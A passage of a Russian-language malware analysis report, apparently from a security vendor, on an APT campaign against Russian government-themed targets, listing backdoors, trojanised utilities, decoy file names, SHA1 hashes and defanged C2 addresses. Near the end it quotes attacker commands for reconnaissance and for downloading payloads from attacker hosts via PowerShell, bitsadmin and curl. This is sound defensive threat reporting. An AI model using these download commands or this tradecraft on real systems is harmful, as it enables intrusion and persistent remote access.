&lt;p&gt;Устанавливает бэкдор &lt;b&gt;BackDoor.Spy.4033&lt;/b&gt;, который в зашифрованном виде хранится в его теле. Этот бэкдор позволяет атакующим выполнять команды в инфицированной системе через обратный шелл.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Известные имена файлов Trojan.Packed2.49708&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1-хеш&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;С2-сервер&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;О проведении личного приема граждан список участников план и проведенная работа.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string" style="text-wrap: nowrap;"&gt;C:\Windows\2o1nzu.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;5684972ded765b0b08b290c85c8fac8ed3fea273&lt;/td&gt;
            &lt;td&gt;185[.]173.37[.]67&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;29ee3910d05e248cfb3ff62bd2e85e9c76db44a5&lt;/td&gt;
            &lt;td&gt;185[.]231.155[.]111&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;О работе почтового сервера план и проведенная работа.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string"&gt;Программный офис Управления Организации Объединенных Наций по наркотикам и преступности (УНП ООН).exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string"&gt;План-протокол встречи о сотрудничестве представителей должн.лиц.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;ce4912e5cd46fae58916c9ed49459c9232955302&lt;/td&gt;
            &lt;td&gt;109[.]172.85[.]95&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string" style="text-wrap: nowrap;"&gt;C:\Windows\746wljxfs.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;653ffc8c3ec85c6210a416b92d828a28b2353c17&lt;/td&gt;
            &lt;td&gt;185[.]173.37[.]67&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;—&lt;/td&gt;
            &lt;td&gt;b52e1c9484ab694720dc62d501deca2aa922a078&lt;/td&gt;
            &lt;td&gt;109[.]172.85[.]95&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;Trojan.Siggen31.54011&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;Устанавливает бэкдор &lt;b&gt;BackDoor.Spy.4038&lt;/b&gt;, который в зашифрованном виде хранится в его теле. Этот бэкдор позволяет атакующим выполнять команды в инфицированной системе через обратный шелл.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://vms.drweb.kz/search/?q=Trojan.Siggen31.54011&amp;lng=kk"&gt;&lt;b&gt;Trojan.Siggen31.54011&lt;/b&gt;&lt;/a&gt; функционально схож с вредоносной программой &lt;a href="https://vms.drweb.kz/search/?q=Trojan.Packed2.49708&amp;lng=kk"&gt;&lt;b&gt;Trojan.Packed2.49708&lt;/b&gt;&lt;/a&gt;, но имеет несколько иной алгоритм извлечения полезной нагрузки.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;SHA1-хеш&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;С2-сервер&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;baab225a50502a156222fcc234a87c09bc2b1647&lt;/td&gt;
            &lt;td&gt;109[.]172.85[.]63&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;93000d43d5c54b07b52efbdad3012e232bdb49cc&lt;/td&gt;
            &lt;td&gt;109[.]172.85[.]63&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;BackDoor.Siggen2.5463&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;Выполняет задания киберпреступников и управляется ими через Telegram-бот. Основная функциональность вредоносной программы расположена в PowerShell-коде, скрытом в ее теле.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Известные имена файлов BackDoor.Siggen2.5463&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1-хеш&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;Полезная нагрузка&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string"&gt;system.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;c96beb026dc871256e86eca01e1f5ba2247a0df6&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;PowerShell.BackDoor.108&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;BackDoor.RShell.169&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;Позволяет злоумышленникам дистанционно подключаться к зараженным компьютерам через обратный шелл для выполнения различных команд.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Известные имена файлов BackDoor.RShell.169&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1-хеш&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;С2-сервер&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string"&gt;Информация по письму в МИД от 6 июля статус и прилагаемые документы.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;633885f16ef1e848a2e057169ab45d363f3f8c57&lt;/td&gt;
            &lt;td&gt;109[.]172.85[.]63&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;BackDoor.ReverseShell.10&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;Запускает обратный шелл и обеспечивает злоумышленникам дистанционный доступ к системе.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Известные имена файлов BackDoor.ReverseShell.10&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1-хеш&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;С2-сервер&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;к проектам.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string"&gt;Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа проектов к проектам.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;dd98dcf6807a7281e102307d61c71b7954b93032&lt;/td&gt;
            &lt;td&gt;195[.]2.78[.]133&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td style="text-align:start;"&gt;
                &lt;span class="string" style="white-space: pre-wrap;"&gt;Служебная записка от 20.08.2025&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string" style="white-space: pre-wrap;"&gt;Служебная записка от 12.08.2025&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
            &lt;/td&gt;
            &lt;td&gt;f546861adc7c8ca88e3b302d274e6fffb63de9b0&lt;/td&gt;
            &lt;td&gt;62[.]113.114[.]209&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;h3&gt;Последующие ступени заражения&lt;/h3&gt;
&lt;p&gt;Нами были обнаружены следующие вредоносные программы, которые могут в дальнейшем устанавливаться на зараженные устройства после компрометации:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.kz/search/?q=Trojan.Inject5.57968&amp;lng=kk"&gt;&lt;b&gt;Trojan.Inject5.57968&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.kz/search/?q=BackDoor.ShellNET.2&amp;lng=kk"&gt;&lt;b&gt;BackDoor.ShellNET.2&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.kz/search/?q=BackDoor.ReverseProxy.1&amp;lng=kk"&gt;&lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.kz/search/?q=Trojan.Packed2.49862&amp;lng=kk"&gt;&lt;b&gt;Trojan.Packed2.49862&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;Trojan.Inject5.57968&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;Троянская программа с зашифрованным в ее теле бэкдором, который позволяет атакующим загружать вредоносные приложения на зараженный компьютер. Расшифровка полезной нагрузки выполняется в несколько шагов, на одном из которых вредоносный массив данных инжектируется в процесс приложения &lt;span class="string"&gt;aspnet_compiler.exe&lt;/span&gt; из пакета Microsoft .NET Framework. В дальнейшем полностью расшифрованный бэкдор работает в контексте процесса этого легитимного приложения.&lt;/p&gt;
&lt;div class="column_grid_review column_grid_review--o" style="margin-bottom:12px;"&gt;
    &lt;a class="preview" href="https://st.drweb.kz/static/new-www/news/2025/october/cavalry_werewolf/02_vxcube_analysis.png"&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/october/cavalry_werewolf/02_vxcube_analysis.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;em&gt;Изучение активности &lt;b&gt;Trojan.Inject5.57968&lt;/b&gt; при помощи «песочницы» интерактивного анализатора угроз Dr.Web vxCube&lt;/em&gt;&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Известные имена файлов Trojan.Inject5.57968&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1-хеш&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;С2-сервер&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;Полезная нагрузка&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;pickmum1.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;e840c521ec436915da71eb9b0cfd56990f4e53e5&lt;/td&gt;
            &lt;td&gt;64[.]95.11[.]202&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;Trojan.PackedNET.3351&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;mummyfile1.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;22641dea0dbe58e71f93615c208610f79d661228&lt;/td&gt;
            &lt;td&gt;64[.]95.11[.]202&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;Trojan.PackedNET.3351&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;BackDoor.ShellNET.2&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;Бэкдор, который управляется через Telegram-бот и выполняет команды атакующих.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Известные имена файлов BackDoor.ShellNET.2&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1-хеш&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;win.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;1957fb36537df5d1a29fb7383bc7cde00cd88c77&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;Бэкдор на основе открытого ПО ReverseSocks5, запускающий обратный SOCS5-прокси в инфицированной системе для получения дистанционного доступа к компьютеру. &lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt; запускается через командную строку cmd.exe с параметром &lt;span class="string"&gt;-connect IP&lt;/span&gt; для подключения к нужному сетевому адресу. Известны модификации бэкдора с зашитыми адресами.&lt;/p&gt;
&lt;p&gt;Выявлены следующие IP:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;span class="string"&gt;78[.]128.112[.]209&lt;/span&gt; (указывался в параметре запуска)&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;96[.]9.125[.]168&lt;/span&gt; (указывался в параметре запуска)&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;188[.]127.231[.]136&lt;/span&gt; (зашит в коде)&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Известные имена файлов BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1-хеш&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;revv2.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;6ec8a10a71518563e012f4d24499b12586128c55&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;Trojan.Packed2.49862&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Trojan.Packed2.49862&lt;/b&gt; — это троянские версии легитимных программ, в которые злоумышленники внедрили вредоносный код. Вирусные аналитики «Доктор Веб» встречали вредоносные модификации архиваторов WinRar и 7-Zip, средства разработки Visual Studio Code, текстового редактора AkelPad и ряда других приложений. Среди них, например, была программа Sumatra PDF Reader, которую киберпреступники выдавали за мессенджер MAX. Такие модификации перестают выполнять основную функциональность и при запуске инициализируют только добавленную к ним троянскую часть.&lt;/p&gt;
&lt;p&gt;В зависимости от целей киберпреступников в этих модификациях могут скрываться самые разные вредоносные программы. Среди них:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.kz/search/?q=BackDoor.ReverseProxy.1&amp;lng=kk"&gt;&lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/a&gt; (&lt;a href="https://github.com/Acebond/ReverseSocks5" target="_blank"&gt;ReverseSocks5&lt;/a&gt;)&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;BackDoor.Shell.275&lt;/b&gt; (&lt;a href="https://github.com/Adaptix-Framework/AdaptixC2" target="_blank"&gt;AdaptixC2&lt;/a&gt;)&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;BackDoor.AdaptixC2.11&lt;/b&gt; (&lt;a href="https://github.com/Adaptix-Framework/AdaptixC2" target="_blank"&gt;AdaptixC2&lt;/a&gt;)&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;BackDoor.Havoc.16&lt;/b&gt; (&lt;a href="https://github.com/HavocFramework/Havoc" target="_blank"&gt;Havoc&lt;/a&gt;)&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;BackDoor.Meterpreter.227&lt;/b&gt; (CobaltStrike)&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Siggen9.56514&lt;/b&gt; (AsyncRAT)&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.kz/search/?q=Trojan.Clipper.808&amp;lng=kk"&gt;&lt;b&gt;Trojan.Clipper.808&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Известные имена файлов Trojan.Packed2.49862&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1-хеш&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;С2-сервер&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;Полезная нагрузка&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;code.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;rev2.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;8279ad4a8ad20bf7bbca0fc54428d6cdc136b776&lt;/td&gt;
            &lt;td&gt;188[.]127.231[.]136&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;code.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;revv.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;a2326011368d994e99509388cb3dc132d7c2053f&lt;/td&gt;
            &lt;td&gt;192[.]168.11[.]10&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;7zr.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;winload.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;system.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;Recorded_TV.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;451cfa10538bc572d9fd3d09758eb945ac1b9437&lt;/td&gt;
            &lt;td&gt;77[.]232.42[.]107&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.Shell.275&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;Command line RAR&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;winlock.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;Recorded_TV.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;a5e7e75ee5c0fb82e4dc2f7617c1fe3240f21db2&lt;/td&gt;
            &lt;td&gt;77[.]232.42[.]107&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.AdaptixC2.11&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;winsrv.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;firefox.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;bbe3a5ef79e996d9411c8320b879c5e31369921e&lt;/td&gt;
            &lt;td&gt;94[.]198.52[.]210&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.AdaptixC2.11&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;AkelPad.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;e8ab26b3141fbb410522b2cbabdc7e00a9a55251&lt;/td&gt;
            &lt;td&gt;78[.]128.112[.]209&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.Havoc.16&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;7z.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;dcd374105a5542ef5100f6034c805878153b1205&lt;/td&gt;
            &lt;td&gt;192[.]168.88[.]104&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.Meterpreter.227&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;7z.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;e51a65f50b8bb3abf1b7f2f9217a24acfb3de618&lt;/td&gt;
            &lt;td&gt;192[.]168.1[.]157&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;Trojan.Siggen9.56514&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;7z.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;chromedriver.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;d2a7bcbf908507af3d7d3b0ae9dbaadd141810a4&lt;/td&gt;
            &lt;td&gt;Telegram-бот&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;Trojan.Clipper.808&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;7z&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;7z.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;svc_host.exe&lt;/span&gt;&lt;br /&gt;
                &lt;span class="string"&gt;dzveo09ww.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;c89c1ed4b6dda8a00af54a0ab6dca0630eb45d81&lt;/td&gt;
            &lt;td&gt;Telegram-бот&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;Trojan.Clipper.808&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;—&lt;/td&gt;
            &lt;td&gt;b05c5fe8b206fb0d168f3a1fc91b0ed548eb46f5&lt;/td&gt;
            &lt;td&gt;Telegram-бот&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;Trojan.Clipper.808&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;max - для бизнеса.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;b4d0d2bbcfc5a52ed8b05c756cfbfa96838af231 &lt;/td&gt;
            &lt;td&gt;89[.]22.161[.]133&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;BackDoor.Havoc.16&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;h3&gt;Характерные для группировки действия внутри скомпрометированной сети&lt;/h3&gt;
&lt;p&gt;После проникновения в компьютерную инфраструктуру целевой организации злоумышленники могут выполнять различные действия по сбору данных и дальнейшему закреплению в системе.&lt;/p&gt;
&lt;p&gt;Для получения информации о зараженном компьютере запускают команды:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;span class="string"&gt;whoami&lt;/span&gt; — получить сведения о текущем пользователе;&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;dir C:\\users\\&amp;lt;user&amp;gt;\\Downloads&lt;/span&gt; — получить список файлов в каталоге «Загрузки» текущего пользователя;&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;dir C:\\users\\public\\pictures\\&lt;/span&gt; — получить список файлов в каталоге «Изображения» из общей директории (с целью определить какие вредоносные программы уже были загружены в систему);&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;ipconfig /all&lt;/span&gt; — получить конфигурацию сети;&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;net user&lt;/span&gt; — получить список всех пользователей в системе.&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;Для сбора информации о прокси-сервере и для проверки работоспособности сети используют команды:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;span class="string"&gt;powershell -c '[System.Net.WebRequest]::DefaultWebProxy.GetProxy(\"https://google.com\")'&lt;/span&gt;&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;curl -I https://google.com&lt;/span&gt;&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;curl -I https://google.com -x &amp;lt;proxy&amp;gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;Для настройки параметров сети используют:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;утилиту командной строки &lt;span class="string"&gt;netsh&lt;/span&gt;, входящую в состав ОС Windows.&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;p&gt;Для последующей доставки вредоносных инструментов в систему используют легитимные инструменты:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;PowerShell (например: &lt;span class="string"&gt;powershell -Command Invoke-WebRequest -Uri \"hxxps[:]//sss[.]qwadx[.]com/revv3.exe\" -OutFile \"C:\\users\\public\\pictures\\rev.exe&lt;/span&gt;);&lt;/li&gt;
    &lt;li&gt;Bitsadmin (например: &lt;span class="string"&gt;bitsadmin /transfer www /download hxxp[:]//195[.]2.79[.]245/rever.exe C:\\users\\public\\pictures\\rev3.exe&lt;/span&gt;);&lt;/li&gt;
    &lt;li&gt;curl (например: &lt;span class="string"&gt;curl -o C:\\users\\public\\pictures\\rev.exe hxxp[:]//195[.]2.79[.]245/code.exe&lt;/span&gt;);&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
